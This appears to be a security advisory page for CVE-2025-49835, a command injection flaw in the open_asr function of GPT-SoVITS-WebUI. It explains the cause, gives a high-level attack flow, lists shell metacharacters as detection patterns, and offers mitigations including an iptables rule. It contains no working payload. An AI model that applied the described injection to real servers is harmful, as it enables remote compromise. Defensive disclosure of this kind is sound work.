CVE-2025-49835 Overview
CVE-2025-49835 is a command injection vulnerability discovered in GPT-SoVITS-WebUI, a popular voice conversion and text-to-speech web interface application. The vulnerability exists in the open_asr function within webui.py, where user-controlled input from the asr_inp_dir parameter (and several other variables) is directly concatenated into system commands without proper sanitization. This allows remote attackers to execute arbitrary commands on the server hosting the application.
Critical Impact
Remote attackers can achieve arbitrary command execution on affected servers by injecting malicious commands through the ASR (Automatic Speech Recognition) directory input parameter, potentially leading to complete system compromise.
Affected Products
- GPT-SoVITS-WebUI version 20250228v3 and prior
- rvc-boss gpt-sovits-webui (all versions up to and including 20250228v3)
Discovery Timeline
- 2025-07-15 - CVE-2025-49835 published to NVD
- 2025-07-30 - Last updated in NVD database
Technical Details for CVE-2025-49835
Vulnerability Analysis
This command injection vulnerability (CWE-77) occurs due to improper neutralization of special elements used in a command. The open_asr function in webui.py accepts user input through the asr_inp_dir parameter and directly incorporates this input into a command string that is subsequently executed by the server. Without proper input validation or sanitization, an attacker can inject shell metacharacters and arbitrary commands that will be interpreted and executed by the underlying operating system.
The vulnerability is network-accessible and requires no authentication or user interaction to exploit. An attacker with network access to the web interface can craft malicious input containing command separators (such as ;, |, or &&) followed by arbitrary system commands. When the application processes this input, the injected commands execute with the same privileges as the web application process.
Root Cause
The root cause of this vulnerability is the direct concatenation of unsanitized user input into system command strings. The application fails to implement proper input validation, sanitization, or parameterized command execution. Multiple locations within webui.py exhibit this pattern, including code at lines 331, 341, 920, and 1034. The lack of input filtering allows shell metacharacters to pass through unmodified, enabling command injection attacks.
Attack Vector
This vulnerability is exploitable over the network through the GPT-SoVITS-WebUI web interface. An attacker can target the ASR functionality by providing a crafted directory path containing shell command injection sequences.
The attack flow typically involves:
- Accessing the GPT-SoVITS-WebUI interface
- Navigating to the ASR (Automatic Speech Recognition) functionality
- Submitting a malicious directory path containing command injection payloads
- The application concatenates the malicious input into a system command
- The injected commands execute on the server with application-level privileges
For detailed technical analysis of the vulnerable code paths, refer to the GitHub Security Advisory (GHSL-2025-045 through GHSL-2025-048).
Detection Methods for CVE-2025-49835
Indicators of Compromise
- Unusual command execution patterns originating from the GPT-SoVITS-WebUI process
- Unexpected child processes spawned by Python or the web application
- Suspicious network connections initiated by the application server
- Anomalous file system modifications or new files created in system directories
- Web server logs containing shell metacharacters (;, |, &&, $()) in ASR-related parameters
Detection Strategies
- Monitor web application logs for requests containing shell metacharacters in input parameters
- Implement application-level logging to track all directory path inputs to the ASR functionality
- Deploy runtime application security monitoring to detect command execution anomalies
- Use endpoint detection solutions to identify suspicious process chains originating from Python web applications
Monitoring Recommendations
- Enable verbose logging for the GPT-SoVITS-WebUI application to capture all user inputs
- Configure network segmentation to limit the blast radius if the application server is compromised
- Implement file integrity monitoring on critical system directories
- Set up alerting for any outbound network connections from the application server to unexpected destinations
How to Mitigate CVE-2025-49835
Immediate Actions Required
- Restrict network access to the GPT-SoVITS-WebUI interface to trusted users and networks only
- Implement a web application firewall (WAF) with rules to block common command injection patterns
- Consider disabling the ASR functionality if not critical to operations
- Run the application in a sandboxed or containerized environment with minimal privileges
- Monitor the RVC-Boss GPT-SoVITS GitHub repository for security updates
Patch Information
At the time of publication, no official patched version is available from the vendor. Organizations using GPT-SoVITS-WebUI should implement the workarounds listed below and monitor the vendor's GitHub repository and the GitHub Security Lab advisory for patch announcements.
Workarounds
- Deploy the application behind a reverse proxy with strict input validation rules
- Implement network-level access controls to limit who can access the web interface
- Run the application in a containerized environment with restricted capabilities and no network egress
- Apply custom input sanitization patches to the webui.py file to filter shell metacharacters from user input
# Example: Restrict network access to GPT-SoVITS-WebUI using iptables
# Allow access only from trusted IP range (e.g., 192.168.1.0/24)
iptables -A INPUT -p tcp --dport 7865 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 7865 -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
